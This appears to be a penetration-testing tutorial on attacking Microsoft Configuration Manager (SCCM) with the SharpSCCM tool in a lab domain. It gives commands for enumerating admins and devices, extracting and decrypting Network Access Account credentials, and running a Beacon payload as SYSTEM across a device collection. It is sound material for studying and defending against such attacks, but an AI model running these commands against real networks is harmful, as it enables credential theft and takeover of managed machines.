Microsoft Configuration Manager

Microsoft Configuration Manager (often shortened to ConfigMgr or MCM), which previous name was Systems Center Configuration Manager (SCCM) and then "Endpoint Configuration Manager" (MECM). Most used name is SCCM.

SCCM's role is to help with system management tasks such as application & software deployments, updates and compliance configuration & reporting.

It has the ability to connect multiple sites helps with scalability, particularly when dealing with different geographic locations.

- Enumeration

First we should enumerate which devices are being managed, and who the administrative users are. This does not require any special privileges in the domain, in SCCM or on the endpoint.

SharpSCCM (https://github.com/Mayyhem/SharpSCCM) will help for this.

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local site-info --no-banner

To do the same manually:

Get-WmiObject -Class SMS_Authority -Namespace root\CCM | select Name, CurrentManagementPoint | fl

We can also check the DACL on the CN=System Management container in AD for machines that have Full Control over it (as this a pre-requisite of SCCM setup in a domain):

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get site-info -d cyberbotic.io --no-banner

Enumerating users, groups, computers, collections, and administrators, etc, does require some level of privilege in SCCM. SCCM employs an RBAC security model - the lowest role is "Read-Only Analyst" and the highest is "Full Administrator". Lots of other roles exist such as "Asset Manager", "Infrastructure Administrator", and "Software Update Manager" (Description of each can be found here: https://learn.microsoft.com/en-us/mem/configmgr/core/understand/fundamentals-of-role-based-administration).

Furthermore, the "scope" of these roles can be restricted to individual collections as needed by the administrative user.

Then, administrative users can be found using get class-instances SMS_Admin:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get class-instances SMS_Admin --no-banner

To see members of a collection:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collection-members -n {collection name} --no-banner

To get all devices:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get device

To obatin more information on each device:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -n {device name} -p Name -p FullDomainName -p IPAddresses -p LastLogonUserName -p OperatingSystemNameandVersion --no-banner

To return devices where the given user was the last to login:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -u {username} -p IPAddresses -p IPSubnets -p Name --no-banner

- Network Access Account Credentials

Domain-joined computers authenticate to SCCM Software Distribution Points (SDPs) (basically just SMB shares), but there may exist not domain-joined computers that not.

Network Access Account credentials (NAAs) are domain credentials intended to be used by not domain-joined computers to access the SDPs over the network. They are passed to the machines as part of the SCCM machine policies, which are then encrypted using DPAPI and stored locally. If they are present, privileged users can retrieve these credential blobs via WMI or directly from disk and decrypt them to recover plaintext credentials.

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local naa -m wmi --no-banner

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local naa -m disk --no-banner

These credentials should only have read access to the SDP, but are often times over privileged.

- Lateral Movement

With Full or Application Administrator privileges over a device or a collection, we can deploy scripts or applications to aid in lateral movement.

To execute a command on every device in a DEV collection:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe exec -n {collection name} -p C:\Windows\notepad.exe --no-banner

By default, the above will execute Notepad as the user currently logged into each machine. If a user is not logged in, then the command won't execute. We can force it to execute as SYSTEM using the -s parameter, and this will execute on every machine regardless of whether a user is currently logged in or not.

We can then upload and execute a payload, for example a DNS Beacon payload.:

execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe exec -n DEV -p "C:\Windows\System32\cmd.exe /c start /b \\dc-2\software\dns_x64.exe" -s --no-banner